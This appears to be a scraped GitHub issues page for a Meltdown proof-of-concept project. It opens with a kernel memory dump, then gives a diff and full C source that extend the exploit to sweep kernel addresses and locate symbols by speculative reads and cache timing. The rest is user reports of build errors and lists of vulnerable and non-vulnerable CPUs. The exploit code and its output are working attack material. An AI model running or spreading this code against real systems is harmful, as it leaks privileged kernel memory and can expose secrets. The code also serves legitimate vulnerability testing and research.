read ffffffffaec0007a = 65 e (score=412/1000)
read ffffffffaec0007b = 6c l (score=112/1000)
read ffffffffaec0007c = 40 @ (score=150/1000)
read ffffffffaec0007d = 6c l (score=102/1000)
read ffffffffaec0007e = 69 i (score=987/1000)
read ffffffffaec0007f = 73 s (score=990/1000)
read ffffffffaec00080 = 74 t (score=995/1000)
read ffffffffaec00081 = 73 s (score=989/1000)
read ffffffffaec00082 = 2e . (score=781/1000)
read ffffffffaec00083 = 64 d (score=994/1000)
read ffffffffaec00084 = 65 e (score=766/1000)
read ffffffffaec00085 = 62 b (score=974/1000)
read ffffffffaec00086 = 69 i (score=996/1000)
read ffffffffaec00087 = 61 a (score=984/1000)
read ffffffffaec00088 = 6e n (score=741/1000)
read ffffffffaec00089 = 2e . (score=701/1000)
read ffffffffaec0008a = 6f o (score=989/1000)
read ffffffffaec0008b = 72 r (score=995/1000)
read ffffffffaec0008c = 67 g (score=993/1000)
read ffffffffaec0008d = 29 ) (score=934/1000)
read ffffffffaec0008e = 20 (score=892/1000)
read ffffffffaec0008f = 28 ( (score=989/1000)
read ffffffffaec00090 = 67 g (score=993/1000)
read ffffffffaec00091 = 63 c (score=983/1000)
read ffffffffaec00092 = 63 c (score=980/1000)
read ffffffffaec00093 = 20 (score=917/1000)
read ffffffffaec00094 = 76 v (score=928/1000)
read ffffffffaec00095 = 65 e (score=332/1000)
read ffffffffaec00096 = 72 r (score=996/1000)
read ffffffffaec00097 = 73 s (score=986/1000)
read ffffffffaec00098 = 69 i (score=979/1000)
read ffffffffaec00099 = 6f o (score=990/1000)
read ffffffffaec0009a = 6e n (score=742/1000)
read ffffffffaec0009b = 20 (score=931/1000)
read ffffffffaec0009c = 36 6 (score=968/1000)
read ffffffffaec0009d = 2e . (score=580/1000)
read ffffffffaec0009e = 33 3 (score=988/1000)
read ffffffffaec0009f = 2e . (score=524/1000)
read ffffffffaec000a0 = 30 0 (score=984/1000)
read ffffffffaec000a1 = 20 (score=903/1000)
read ffffffffaec000a2 = 32 2 (score=963/1000)
read ffffffffaec000a3 = 30 0 (score=983/1000)
read ffffffffaec000a4 = 31 1 (score=994/1000)
read ffffffffaec000a5 = 37 7 (score=953/1000)
read ffffffffaec000a6 = 30 0 (score=987/1000)
read ffffffffaec000a7 = 35 5 (score=843/1000)
read ffffffffaec000a8 = 31 1 (score=996/1000)
read ffffffffaec000a9 = 36 6 (score=950/1000)
read ffffffffaec000aa = 20 (score=958/1000)
read ffffffffaec000ab = 28 ( (score=991/1000)
read ffffffffaec000ac = 44 D (score=297/1000)
read ffffffffaec000ad = 65 e (score=642/1000)
read ffffffffaec000ae = 62 b (score=979/1000)
read ffffffffaec000af = 69 i (score=994/1000)
read ffffffffaec000b0 = 61 a (score=982/1000)
read ffffffffaec000b1 = 6e n (score=751/1000)
read ffffffffaec000b2 = 20 (score=946/1000)
read ffffffffaec000b3 = 36 6 (score=963/1000)
read ffffffffaec000b4 = 2e . (score=511/1000)
read ffffffffaec000b5 = 33 3 (score=988/1000)
read ffffffffaec000b6 = 2e . (score=624/1000)
read ffffffffaec000b7 = 30 0 (score=987/1000)
read ffffffffaec000b8 = 2d - (score=943/1000)
read ffffffffaec000b9 = 31 1 (score=994/1000)
read ffffffffaec000ba = 38 8 (score=981/1000)
read ffffffffaec000bb = 29 ) (score=893/1000)
read ffffffffaec000bc = 20 (score=930/1000)
read ffffffffaec000bd = 29 ) (score=964/1000)
read ffffffffaec000be = 20 (score=918/1000)
read ffffffffaec000bf = 25 % (score=992/1000)
read ffffffffaec000c0 = 73 s (score=991/1000)
read ffffffffaec000c1 = ff (score=0/1000)
read ffffffffaec000c2 = ff (score=0/1000)
read ffffffffaec000c3 = ff (score=0/1000)
read ffffffffaec000c4 = ff (score=0/1000)
read ffffffffaec000c5 = ff (score=0/1000)
read ffffffffaec000c6 = ff (score=0/1000)
read ffffffffaec000c7 = ff (score=0/1000)
read ffffffffaec000c8 = ff (score=0/1000)
read ffffffffaec000c9 = ff (score=0/1000)
read ffffffffaec000ca = ff (score=0/1000)
read ffffffffaec000cb = ff (score=0/1000)
read ffffffffaec000cc = ff (score=0/1000)
read ffffffffaec000cd = ff (score=0/1000)
read ffffffffaec000ce = ff (score=0/1000)
read ffffffffaec000cf = ff (score=0/1000)
read ffffffffaec000d0 = ff (score=0/1000)
read ffffffffaec000d1 = ff (score=0/1000)
read ffffffffaec000d2 = ff (score=0/1000)
read ffffffffaec000d3 = ff (score=0/1000)
read ffffffffaec000d4 = ff (score=0/1000)
read ffffffffaec000d5 = ff (score=0/1000)
read ffffffffaec000d6 = ff (score=0/1000)
read ffffffffaec000d7 = ff (score=0/1000)
read ffffffffaec000d8 = ff (score=0/1000)
read ffffffffaec000d9 = ff (score=0/1000)
read ffffffffaec000da = ff (score=0/1000)
read ffffffffaec000db = ff (score=0/1000)
read ffffffffaec000dc = ff (score=0/1000)
read ffffffffaec000dd = ff (score=0/1000)
read ffffffffaec000de = ff (score=0/1000)
read ffffffffaec000df = ff (score=0/1000)
read ffffffffaec000e0 = 4c L (score=918/1000)
read ffffffffaec000e1 = 69 i (score=992/1000)
read ffffffffaec000e2 = 6e n (score=833/1000)
read ffffffffaec000e3 = 75 u (score=363/1000)
read ffffffffaec000e4 = 78 x (score=902/1000)
read ffffffffaec000e5 = 20 (score=940/1000)
read ffffffffaec000e6 = 76 v (score=940/1000)
read ffffffffaec000e7 = 65 e (score=347/1000)
read ffffffffaec000e8 = 72 r (score=994/1000)
read ffffffffaec000e9 = 73 s (score=995/1000)
read ffffffffaec000ea = 69 i (score=994/1000)
read ffffffffaec000eb = 6f o (score=984/1000)
read ffffffffaec000ec = 6e n (score=674/1000)
read ffffffffaec000ed = 20 (score=921/1000)
read ffffffffaec000ee = 34 4 (score=987/1000)
read ffffffffaec000ef = 2e . (score=497/1000)
read ffffffffaec000f0 = 39 9 (score=598/1000)
read ffffffffaec000f1 = 2e . (score=627/1000)
read ffffffffaec000f2 = 30 0 (score=982/1000)
read ffffffffaec000f3 = 2d - (score=921/1000)
read ffffffffaec000f4 = 33 3 (score=986/1000)
read ffffffffaec000f5 = 2d - (score=936/1000)
read ffffffffaec000f6 = 61 a (score=976/1000)
read ffffffffaec000f7 = 6d m (score=976/1000)
read ffffffffaec000f8 = 64 d (score=986/1000)
read ffffffffaec000f9 = 36 6 (score=965/1000)
read ffffffffaec000fa = 34 4 (score=994/1000)
read ffffffffaec000fb = 20 (score=956/1000)
read ffffffffaec000fc = 28 ( (score=985/1000)
read ffffffffaec000fd = 64 d (score=982/1000)
read ffffffffaec000fe = 65 e (score=333/1000)
read ffffffffaec000ff = 62 b (score=981/1000)
Dumped: ����������������������������������������������������������������_debug��������������������������%s version %s ([email protected]) (gcc version 6.3.0 20170516 (Debian 6.3.0-18) ) %s�������������������������������Linux version 4.9.0-3-amd64 (deb
offset: 0x41 ; found __param_str_initcall_debug: ffffffffaec00041
Diff
diff --git a/meltdown.c b/meltdown.c
index 5cea383..90bd92e 100644
--- a/meltdown.c
+++ b/meltdown.c
@@ -234,9 +234,7 @@ static void pin_cpu0()
int main(int argc, char *argv[])
{
- int ret, fd, i, score, is_vulnerable;
unsigned long addr, size;
- static char expected[] = "%s version %s";
progname = argv[0];
if (argc < 3)
@@ -248,6 +246,18 @@ int main(int argc, char *argv[])
if (sscanf(argv[2], "%lx", &size) != 1)
return usage();
+ unsigned long step = 0x100000;
+ unsigned long addr_max = 0xffffffffffffffff;
+ unsigned long i;
+ for (i = addr; i < addr_max; i += step) {
+ if (leak(i, size)) break;
+ }
+}
+
+int leak(unsigned long addr, unsigned long size) {
+ int ret, fd, i, score, is_vulnerable;
+ static char expected[] = "%s version %s";
+
memset(target_array, 1, sizeof(target_array));
ret = set_signal();
@@ -261,6 +271,10 @@ int main(int argc, char *argv[])
return -1;
}
+ char buf[1024];
+ buf[0] = '\0';
+
+ unsigned long start = addr;
for (score = 0, i = 0; i < size; i++) {
ret = readbyte(fd, addr);
if (ret == -1)
@@ -270,6 +284,8 @@ int main(int argc, char *argv[])
ret != 0xff ? hist[ret] : 0,
CYCLES);
+ strncat(buf, &ret, 1);
+
if (i < sizeof(expected) &&
ret == expected[i])
score++;
@@ -277,14 +293,35 @@ int main(int argc, char *argv[])
addr++;
}
+ printf("Dumped: %s\n", buf);
+
+ char * found;
+
+ found = strstr(buf, "debug");
+ unsigned long offset;
+ if (found) {
+ offset = found - buf;
+ printf("offset: %p ; found __param_str_initcall_debug: %lx\n", offset, (offset + (unsigned long)start));
+ return 1;
+ }
+
+ found = strstr(buf, expected);
+ if (found) {
+ offset = found - buf;
+ printf("offset: %p ; found linux_proc_banner: %lx\n", offset, (offset + (unsigned long)start));
+ return 1;
+ }
+
close(fd);
is_vulnerable = score > min(size, sizeof(expected)) / 2;
- if (is_vulnerable)
+ if (is_vulnerable) {
fprintf(stderr, "VULNERABLE\n");
+ exit(is_vulnerable);
+ }
else
fprintf(stderr, "NOT VULNERABLE\n");
- exit(is_vulnerable);
+ return is_vulnerable;
}Source
#define _GNU_SOURCE
#include <stdio.h>
#include <string.h>
#include <signal.h>
#include <ucontext.h>
#include <unistd.h>
#include <fcntl.h>
#include <ctype.h>
#include <sched.h>
#include <x86intrin.h>
#include "rdtscp.h"
//#define DEBUG 1
#if !(defined(__x86_64__) || defined(__i386__))
# error "Only x86-64 and i386 are supported at the moment"
#endif
#define TARGET_OFFSET 12
#define TARGET_SIZE (1 << TARGET_OFFSET)
#define BITS_READ 8
#define VARIANTS_READ (1 << BITS_READ)
static char target_array[VARIANTS_READ * TARGET_SIZE];
void clflush_target(void)
{
int i;
for (i = 0; i < VARIANTS_READ; i++)
_mm_clflush(&target_array[i * TARGET_SIZE]);
}
extern char stopspeculate[];
static void __attribute__((noinline))
speculate(unsigned long addr)
{
#ifdef __x86_64__
asm volatile (
"1:\n\t"
".rept 300\n\t"
"add $0x141, %%rax\n\t"
".endr\n\t"
"movzx (%[addr]), %%eax\n\t"
"shl $12, %%rax\n\t"
"jz 1b\n\t"
"movzx (%[target], %%rax, 1), %%rbx\n"
"stopspeculate: \n\t"
"nop\n\t"
:
: [target] "r" (target_array),
[addr] "r" (addr)
: "rax", "rbx"
);
#else /* ifdef __x86_64__ */
asm volatile (
"1:\n\t"
".rept 300\n\t"
"add $0x141, %%eax\n\t"
".endr\n\t"
"movzx (%[addr]), %%eax\n\t"
"shl $12, %%eax\n\t"
"jz 1b\n\t"
"movzx (%[target], %%eax, 1), %%ebx\n"
"stopspeculate: \n\t"
"nop\n\t"
:
: [target] "r" (target_array),
[addr] "r" (addr)
: "rax", "rbx"
);
#endif
}
static int cache_hit_threshold;
static int hist[VARIANTS_READ];
void check(void)
{
int i, time, mix_i;
volatile char *addr;
for (i = 0; i < VARIANTS_READ; i++) {
mix_i = ((i * 167) + 13) & 255;
addr = &target_array[mix_i * TARGET_SIZE];
time = get_access_time(addr);
if (time <= cache_hit_threshold)
hist[mix_i]++;
}
}
void sigsegv(int sig, siginfo_t *siginfo, void *context)
{
ucontext_t *ucontext = context;
#ifdef __x86_64__
ucontext->uc_mcontext.gregs[REG_RIP] = (unsigned long)stopspeculate;
#else
ucontext->uc_mcontext.gregs[REG_EIP] = (unsigned long)stopspeculate;
#endif
return;
}
int set_signal(void)
{
struct sigaction act = {
.sa_sigaction = sigsegv,
.sa_flags = SA_SIGINFO,
};
return sigaction(SIGSEGV, &act, NULL);
}
#define CYCLES 1000
int readbyte(int fd, unsigned long addr)
{
int i, ret = 0, max = -1, maxi = -1;
static char buf[256];
memset(hist, 0, sizeof(hist));
for (i = 0; i < CYCLES; i++) {
ret = pread(fd, buf, sizeof(buf), 0);
if (ret < 0) {
perror("pread");
break;
}
clflush_target();
_mm_mfence();
speculate(addr);
check();
}
#ifdef DEBUG
for (i = 0; i < VARIANTS_READ; i++)
if (hist[i] > 0)
printf("addr %lx hist[%x] = %d\n", addr, i, hist[i]);
#endif
for (i = 1; i < VARIANTS_READ; i++) {
if (!isprint(i))
continue;
if (hist[i] && hist[i] > max) {
max = hist[i];
maxi = i;
}
}
return maxi;
}
static char *progname;
int usage(void)
{
printf("%s: [hexaddr] [size]\n", progname);
return 2;
}
static int mysqrt(long val)
{
int root = val / 2, prevroot = 0, i = 0;
while (prevroot != root && i++ < 100) {
prevroot = root;
root = (val / root + root) / 2;
}
return root;
}
#define ESTIMATE_CYCLES 1000000
static void
set_cache_hit_threshold(void)
{
long cached, uncached, i;
if (0) {
cache_hit_threshold = 80;
return;
}
for (cached = 0, i = 0; i < ESTIMATE_CYCLES; i++)
cached += get_access_time(target_array);
for (cached = 0, i = 0; i < ESTIMATE_CYCLES; i++)
cached += get_access_time(target_array);
for (uncached = 0, i = 0; i < ESTIMATE_CYCLES; i++) {
_mm_clflush(target_array);
uncached += get_access_time(target_array);
}
cached /= ESTIMATE_CYCLES;
uncached /= ESTIMATE_CYCLES;
cache_hit_threshold = mysqrt(cached * uncached);
printf("cached = %ld, uncached = %ld, threshold %d\n",
cached, uncached, cache_hit_threshold);
}
static int min(int a, int b)
{
return a < b ? a : b;
}
static void pin_cpu0()
{
cpu_set_t mask;
/* PIN to CPU0 */
CPU_ZERO(&mask);
CPU_SET(0, &mask);
sched_setaffinity(0, sizeof(cpu_set_t), &mask);
}
int main(int argc, char *argv[])
{
unsigned long addr, size;
progname = argv[0];
if (argc < 3)
return usage();
if (sscanf(argv[1], "%lx", &addr) != 1)
return usage();
if (sscanf(argv[2], "%lx", &size) != 1)
return usage();
unsigned long step = 0x100000;
unsigned long addr_max = 0xffffffffffffffff;
unsigned long i;
for (i = addr; i < addr_max; i += step) {
if (leak(i, size)) break;
}
}
int leak(unsigned long addr, unsigned long size) {
int ret, fd, i, score, is_vulnerable;
static char expected[] = "%s version %s";
memset(target_array, 1, sizeof(target_array));
ret = set_signal();
pin_cpu0();
set_cache_hit_threshold();
fd = open("/proc/version", O_RDONLY);
if (fd < 0) {
perror("open");
return -1;
}
char buf[1024];
buf[0] = '\0';
unsigned long start = addr;
for (score = 0, i = 0; i < size; i++) {
ret = readbyte(fd, addr);
if (ret == -1)
ret = 0xff;
printf("read %lx = %x %c (score=%d/%d)\n",
addr, ret, isprint(ret) ? ret : ' ',
ret != 0xff ? hist[ret] : 0,
CYCLES);
strncat(buf, &ret, 1);
if (i < sizeof(expected) &&
ret == expected[i])
score++;
addr++;
}
printf("Dumped: %s\n", buf);
char * found;
found = strstr(buf, "debug");
unsigned long offset;
if (found) {
offset = found - buf;
printf("offset: %p ; found __param_str_initcall_debug: %lx\n", offset, (offset + (unsigned long)start));
return 1;
}
found = strstr(buf, expected);
if (found) {
offset = found - buf;
printf("offset: %p ; found linux_proc_banner: %lx\n", offset, (offset + (unsigned long)start));
return 1;
}
close(fd);
is_vulnerable = score > min(size, sizeof(expected)) / 2;
if (is_vulnerable) {
fprintf(stderr, "VULNERABLE\n");
exit(is_vulnerable);
}
else
fprintf(stderr, "NOT VULNERABLE\n");
return is_vulnerable;
}why must the random sequence is used in check()?
why mix_i = i does't work but
mix_i = ((i * 167) + 13) & 255 works?
because it
addr = &target_array[mix_i * TARGET_SIZE];
will cover the following cache?
Can`t compile on RPI - Raspbian.
Looks like working only on x86 because can`t compile on my RPI.
taken@raspberrypi:~/meltdown-exploit-master $ make
cc -O2 -msse2 -c -o meltdown.o meltdown.c
cc: error: unrecognized command line option '-msse2'
: recipe for target 'meltdown.o' failed
make: *** [meltdown.o] Error 1
taken@raspberrypi:~/meltdown-exploit-master $ make CFLAGS=-DHAVE_RDTSCP=0 clean all
rm -f meltdown.o meltdown
cc -DHAVE_RDTSCP=0 -c -o meltdown.o meltdown.c
meltdown.c:11:23: fatal error: x86intrin.h: No such file or directory
#include <x86intrin.h>
^
compilation terminated.
: recipe for target 'meltdown.o' failed
make: *** [meltdown.o] Error 1
Best Regards
TaKeN
What if "test ffffffffb7a0008 = 0000000000000000" printed in output?
$ ./run.sh
+ awk /linux_proc_banner/ { print $1 } /proc/kallsyms
+ linux_proc_banner=ffffffffb7a0008
+ test ffffffffb7a0008 = 0000000000000000
+ meltdown ffffffffb7a0008 16
cached = 69, uncached = 476, threshold 181
ffffffffb7a00080 = 0
ffffffffb7a00081 = 0
...
Souldn't it also work, if /proc/version" is read from an other process into buffer?
Just for understanding,
you open (proc-)file "/proc/version" and to get one bit of output you read 10000 times 256bit of it (always at the same position)
(void) pread(fd, buf, sizeof(buf), 0);
I don't understand it completly, but I mean reading a file while opening it, is no big deal.
Should it not also work, if /proc/version is read for some seconds by an other process?
I put the read file stuff into an other file and recompiled both. With running read process I started
./run.sh but I only get:
ffffffffbbe00060 = 0
ffffffffbbe00061 = 0
ffffffffbbe00062 = 0
...
Does not build on 32bit with gcc 7.2.0
$ gcc -v
Using built-in specs.
COLLECT_GCC=gcc
COLLECT_LTO_WRAPPER=/usr/lib/gcc/i686-linux-gnu/7/lto-wrapper
Target: i686-linux-gnu
Configured with: ../src/configure -v --with-pkgversion='Debian 7.2.0-18' --with-bugurl=file:///usr/share/doc/gcc-7/README.Bugs --enable-languages=c,ada,c++,go,brig,d,fortran,objc,obj-c++ --prefix=/usr --with-gcc-major-version-only --program-suffix=-7 --program-prefix=i686-linux-gnu- --enable-shared --enable-linker-build-id --libexecdir=/usr/lib --without-included-gettext --enable-threads=posix --libdir=/usr/lib --enable-nls --with-sysroot=/ --enable-clocale=gnu --enable-libstdcxx-debug --enable-libstdcxx-time=yes --with-default-libstdcxx-abi=new --enable-gnu-unique-object --disable-vtable-verify --enable-libmpx --enable-plugin --enable-default-pie --with-system-zlib --with-target-system-zlib --enable-objc-gc=auto --enable-targets=all --enable-multiarch --disable-werror --with-arch-32=i686 --with-multilib-list=m32,m64,mx32 --enable-multilib --with-tune=generic --enable-checking=release --build=i686-linux-gnu --host=i686-linux-gnu --target=i686-linux-gnu
Thread model: posix
gcc version 7.2.0 (Debian 7.2.0-18)
$ make
cc -O0 -c -o meltdown.o meltdown.c
meltdown.c: In function ‘sigsegv’:
meltdown.c:81:30: error: ‘REG_RIP’ undeclared (first use in this function); did you mean ‘REG_EIP’?
ucontext->uc_mcontext.gregs[REG_RIP] = (unsigned long)stopspeculate;
^~~~~~~
REG_EIP
meltdown.c:81:30: note: each undeclared identifier is reported only once for each function it appears in
<builtin>: recipe for target 'meltdown.o' failed
Vulnerable CPU/kernels list
It will be hard to merge all the vulnerable CPUs into README.md.
Please, report them here instead.
root cause of the meltdown and spectre vulnerability
I am confused recently about these two vulnerabilities. Many articles say that speculative execution and out-of-order execution leads to these to vulns. I don't think so, because I find that exploiting either of these two vulns to leak kernel addressspace is nearly possible, except for the situation in the poc (that is, read /proc/version first, and then read the corresponding system symbols. )
So it seems in fact it's because that the memory load operation from L1 cache didn't carry the privilege verification. Am I understanding right?
awk run without sudo
I try build & run, but look like awk run without sudo
$ make cc -O0 -c -o meltdown.o meltdown.c cc meltdown.o -o meltdown
$ ./run.sh
+ awk /linux_proc_banner/ { print $1 } /proc/kallsyms
...
What is wrong?
Thank you! paboldin
processor : 0
vendor_id : GenuineIntel
cpu family : 6
model : 142
model name : Intel(R) Core(TM)2 i7-7500U CPU @ 2.70GHz
stepping : 9
microcode : 0xb4
cpu MHz : 2904.001
cache size : 4096 KB
physical id : 0
Kali VM
VULNERABLE ON
4.13.0-kali1-amd64 #1 SMP Debian 4.13.4-2kali1 (2017-10-16) unknown
processor : 0
vendor_id : GenuineIntel
cpu family : 6
model : 58
model name : Intel(R) Core(TM) i5-3570K CPU @ 3.40GHz
stepping : 9
microcode : 0x19
cpu MHz : 3429.978
cache size : 6144 KB
physical id : 0
run.sh add a --loop option so it runs the test in a loop
I made a new verion of run.sh that adds an option --loop so that the test can be run in a loop. For those systems which show NOT VULNERABLE, the test should be run perhaps 100 to 1000 times to really verify no vulnerability. I have some Intel P4 processors that only show VULNERABLE once in 200 to once in 2000 runs and the test string of "%s version %s" is only partially correct. My assumption is that the exploit is unlikely to succeed on those processors.
I'm somewhat new to github, should I attach my run_loop.sh here?
Intel(R) Core(TM) i5-2400 CPU @ 3.10GHz
looking for linux_proc_banner in /proc/kallsyms
protected. requires root
- find_linux_proc_banner /proc/kallsyms sudo
- sudo sed -n -re s/^([0-9a-f][1-9a-f][0-9a-f]) .* linux_proc_banner$/\1/p /proc/kallsyms
- linux_proc_banner=ffffffff81a00060
- set +x
cached = 34, uncached = 208, threshold 84
read ffffffff81a00060 = 25 % (score=995/1000)
read ffffffff81a00061 = 73 s (score=988/1000)
read ffffffff81a00062 = 20 (score=991/1000)
read ffffffff81a00063 = 76 v (score=991/1000)
read ffffffff81a00064 = 65 e (score=989/1000)
read ffffffff81a00065 = 72 r (score=989/1000)
read ffffffff81a00066 = 73 s (score=989/1000)
read ffffffff81a00067 = 69 i (score=991/1000)
read ffffffff81a00068 = 6f o (score=995/1000)
read ffffffff81a00069 = 6e n (score=990/1000)
read ffffffff81a0006a = 20 (score=990/1000)
read ffffffff81a0006b = 25 % (score=990/1000)
read ffffffff81a0006c = 73 s (score=962/1000)
read ffffffff81a0006d = 20 (score=987/1000)
read ffffffff81a0006e = 28 ( (score=988/1000)
read ffffffff81a0006f = 62 b (score=985/1000)
VULNERABLE
PLEASE POST THIS TO #19
VULNERABLE ON
4.4.0-104-lowlatency #127~14.04.1-Ubuntu SMP PREEMPT Mon Dec 11 13:51:42 UTC 2017 x86_64
processor : 0
vendor_id : GenuineIntel
cpu family : 6
model : 42
model name : Intel(R) Core(TM) i5-2400 CPU @ 3.10GHz
stepping : 7
microcode : 0x29
cpu MHz : 3313.488
cache size : 6144 KB
physical id : 0
find_linux_proc_banner does not work on Debian
On Debian systems standard awk command does not support strtonum function. Probably it is just GNU extension which is available in gawk (GNU awk).
Starting ./run.sh just show follwing error:
looking for linux_proc_banner in /proc/kallsyms
awk: line 7: function strtonum never defined
Here is patch which implements find_linux_proc_banner function in more compatible way:
diff --git a/run.sh b/run.sh
index 39419b7..e6629b7 100755
--- a/run.sh
+++ b/run.sh
@@ -1,12 +1,7 @@
#!/bin/sh
find_linux_proc_banner() {
- $2 awk '
- /linux_proc_banner/ {
- if (strtonum("0x"$1))
- print $1;
- exit 0;
- }' $1
+ $2 sed -n -E 's/^([0-9a-f]+) .* linux_proc_banner$/\1/p' $1
}
echo "looking for linux_proc_banner in /proc/kallsyms"
Not Vulnerable
NOT VULNERABLE ON
4.9.0-5-686-pae #1 SMP Debian 4.9.65-3+deb9u2 (2018-01-04) unknown
processor : 0
vendor_id : GenuineIntel
cpu family : 6
model : 15
model name : Intel(R) Pentium(R) Dual CPU E2160 @ 1.80GHz
stepping : 13
cpu MHz : 900.000
cache size : 1024 KB
physical id : 0
siblings : 2
Recommend Projects
-
React
A declarative, efficient, and flexible JavaScript library for building user interfaces.
-
Vue.js
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
-
Typescript
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
-
TensorFlow
An Open Source Machine Learning Framework for Everyone
-
Django
The Web framework for perfectionists with deadlines.
-
Laravel
A PHP framework for web artisans
-
D3
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
-
Recommend Topics
-
javascript
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
-
web
Some thing interesting about web. New door for the world.
-
server
A server is a program made to process requests and deliver data to clients.
-
Machine learning
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
-
Visualization
Some thing interesting about visualization, use data art
-
Game
Some thing interesting about game, make everyone happy.
Recommend Org
-
Facebook
We are working to build community through open source technology. NB: members must have two-factor auth.
-
Microsoft
Open source projects and samples from Microsoft.
-
Google
Google ❤️ Open Source for everyone.
-
Alibaba
Alibaba Open Source for everyone
-
D3
Data-Driven Documents codes.
-
Tencent
China tencent open source team.